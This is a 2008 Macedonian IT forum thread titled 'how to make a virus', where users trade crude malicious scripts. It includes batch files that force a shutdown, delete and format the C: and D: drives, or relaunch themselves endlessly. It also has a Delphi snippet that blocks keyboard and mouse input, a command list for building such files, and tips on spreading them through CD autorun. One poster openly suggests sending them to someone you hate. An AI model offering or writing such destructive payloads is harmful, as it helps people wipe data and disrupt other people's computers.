1. Здраво и добредојдовте на форумот на IT.mk.

  Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.
  Сокриј

Како да направите вирус + кој има направено вирус и каков.

Дискусија во форумот 'Вируси // Тројанци // Ботови' започната од GeNeRaToR, 3 Февруари 2008.

Статус на темата:
Затворена за нови мислења.
 1. GeNeRaToR

  GeNeRaToR
  Intern

  538
  7
  20 Јануари 2008
  Овде има некој работи за правење вируси доколку темата е неприфатлива избришете ја. Плус вие пишете кој и каков вирус сте направиле. Најчесто едноставни, а може и комплицирани.

  Еве нешто од мене: Многу едноставен кој кога ке го вклучиш ти се гаси компјутерот.
  |отворете notepad и во него пишете|
  shutdown -s -t 60 -c "Вашата порака до тој што ке го отвори вирусот"
  Scan
  dir C:\
  Gate Scan
  Снимите го овој фајл како нешто.bat

  Доколку случајно го вклучите има начин да го деактивирате гасењето:
  Во StartMeny => Run напишете shutdown -a
   
 2. genius

  genius
  Gaining Experience

  357
  235
  6 ноември 2007
  Sum napravil samo ednostavni virus vo notepad za brisenje na system32 so ekstenzija .bat .Temata ti e dobra i me interesira ima li nekoj napraveno nekoi poslozeni virusi??
   
 3. GeNeRaToR

  GeNeRaToR
  Intern

  538
  7
  20 Јануари 2008
  Моментално конфигурирам (правам) уште еден вирус. Иначе за тие што не знаат да направат основни вируси во notepad овде можат да научат и да им ги пратат тие вируси на некој што го мразат. :LOL::LOL::LOL:
   
 4. Aleks

  Aleks
  Gaining Experience

  5,748
  286
  18 Мај 2007
  Код:
   if FunctionDetect('USER32.DLL', 'BlockInput', @xBlockInput) then
    begin
     xBlockInput(True); // Disable Keyboard & mouse
     Sleep(10000);     // Wait for 10 Seconds
     xBlockInput(False); // Enable Keyboard & mouse
    end;
  ova e del od kodot na eden moj virus .. vo delphi napraen .. mozebi nekoj kje go iskoriste :)
   
 5. GeNeRaToR

  GeNeRaToR
  Intern

  538
  7
  20 Јануари 2008
  Епа браво за твојот вирус, наскоро ке го видите и мојот нов.
   
 6. Aleks

  Aleks
  Gaining Experience

  5,748
  286
  18 Мај 2007
  super. .. samo da ne e batch skripta :LOL:
   
 7. dimitars

  dimitars
  Gaining Experience

  1,676
  332
  8 Мај 2007
  Oti koj budala otvora bat filovi vo ova vreme?
   
 8. vik

  vik
  Intern

  1,936
  31
  14 Април 2007
  Во право си!:rolleyes:
   
 9. GeNeRaToR

  GeNeRaToR
  Intern

  538
  7
  20 Јануари 2008
  Немора да отвори. Доколку стави ЦД преку Autorun скрипта може само да се отвори и бум.
   
 10. hmmm

  hmmm
  Gaining Experience

  1,242
  81
  30 ноември 2007
  epa da, ke si napravis edno autorun scriptce i ke zavrsi rabota :LOL:
   
 11. GeNeRaToR

  GeNeRaToR
  Intern

  538
  7
  20 Јануари 2008
  Еве некои команди за креирање на .bat вирус !!!!!!

  md - креирај фајл
  title - наслов во TITLEBAR-от
  ping localhost -n *број* >nul - пауза
  dir /s - скенирај
  cls - нов прозорец
  start - вклучи програм
  del - избриши фајл
  copy - копирај команда или фајл
  :begin - почни команда
  msg * *порака* - POPUP прозорец со порака
  taskkill /f /im *задача* - затвори задача (слично на EndTask)
   
 12. vik

  vik
  Intern

  1,936
  31
  14 Април 2007
  Затоа сенешно време гасиме Autorun;) (барем јас ако не другите)
   
 13. dimitars

  dimitars
  Gaining Experience

  1,676
  332
  8 Мај 2007
  Siguren si?
   
 14. AMD_fan

  AMD_fan
  Certified IT Addict

  3,646
  138
  10 ноември 2007
  Машко
 15. hmmm

  hmmm
  Gaining Experience

  1,242
  81
  30 ноември 2007
  i jas isklucuvam autorun
   
 16. Blagojce

  Blagojce
  Gaining Experience

  888
  67
  26 Декември 2007
  Машко
  Програмер
  Еве еден за формат. Отворете notepad и напишете:
  @echo off
  DEL C:\ -y
  DEL D:\ -y
  FORMAT C:\ -y
  и зачувајте го со *.bat екстензија.
  Само не го отворајте на вашиот компјутер.:LOL:
   
 17. Aleks

  Aleks
  Gaining Experience

  5,748
  286
  18 Мај 2007
  i nishto nema da naprae :D:D pogodi zasto? Shto mislesh, windowsot kje napravi samoubistvo
   
 18. ''TcM>>

  ''TcM>>
  Intern

  961
  39
  6 Јануари 2008
  Машко
  Dobro jas sum noob u ovie raboti, i go praam samo toa sto ke go najdam na internet.. Pa taka da najdov nesto vakvo koe sto pak e epten ednostavno:
  Znaci u notepad se pisuva:
  start virus.bat
  virus.bat
  I se socuvuva kako *.bat
  hmmm mozda ke vi bide smesno ako nema vrska, ali toa go najdov pa ne ni znam dali voopsto deluva, a strav mi e da go isprobam sam :)):p
  ...............
   
 19. Blagojce

  Blagojce
  Gaining Experience

  888
  67
  26 Декември 2007
  Машко
  Програмер
  Па пробај на дискот каде што не ти е снимен window-от. Јас си признавам дека на мојот компјутер не ми е испробан.:LOL:
   
 20. dimitars

  dimitars
  Gaining Experience

  1,676
  332
  8 Мај 2007
  Nema niso strasno ovde:D. NE se sekiraj, smamo go starrtuva fajlot sto vekje e startuvan. Mislam deka idejata e da se uplasi korisnikot zatoa sto fajlot kje se startuva x pati, t.e. mngou pati.
   
 21. GeNeRaToR

  GeNeRaToR
  Intern

  538
  7
  20 Јануари 2008
  faljot se startuva beskraj pati taa skripta ja imam isprobano. ok e ako sakas nekoj da zaplasis
   
 22. petar.bt

  petar.bt
  Intern

  731
  20
  12 Август 2007
  работи го пробав на flash drive
   
 23. petar.bt

  petar.bt
  Intern

  731
  20
  12 Август 2007
  го пробав работи успешно
   
 24. Vavo

  Vavo
  Intern

  270
  14
  20 oктомври 2007
  Машко
  mislam deka ne mozesh da go formatirash diskot koj te e boot na windowsot. Inaku imashe na vremeto eden program koj pravi virusi..vo sustina beshe nesto kako wizard (windows terminologija) ti birash koi opcii da gi ima virusot..format / time bomb bla bla i fura. Samo sto novite operativni sistemi ne mozesh taka da gi butkash lesno...poveke pravat problemi ( zamaraat )... Vo osnova virusite treba da bidat sposobni da se shirat samite...ama djabe virusot ako e samo nastinka :D
   
 25. Aleks

  Aleks
  Gaining Experience

  5,748
  286
  18 Мај 2007
  Dokolku nekoj saka da napravi VISTINSKI virus, treba da ima poznavanje barem vo eden high level jazik (kako C/C++), da ima poznavanje kako kompjuterot raboti, operativnio sistem (asembler bi bilo pozeno) itn... Fakt e deka treba da se znaat mnogu raboti za da moze da se napise eden virus. Temava e super.. ama dajte zborete za vistinski virusi a ne za ".BAT jokes"

  pozz
   
Слични теми
 1. HijackHacker
  Одговори:
  32
  Прегледи:
  5,529
 2. fuUuUzZzZy
  Одговори:
  6
  Прегледи:
  2,038
 3. zoki-41
  Одговори:
  7
  Прегледи:
  1,853
 4. ajvar
  Одговори:
  8
  Прегледи:
  1,751
 5. важна
  Одговори:
  9
  Прегледи:
  1,112
Вчитување...
Статус на темата:
Затворена за нови мислења.

Сподели

Вчитување...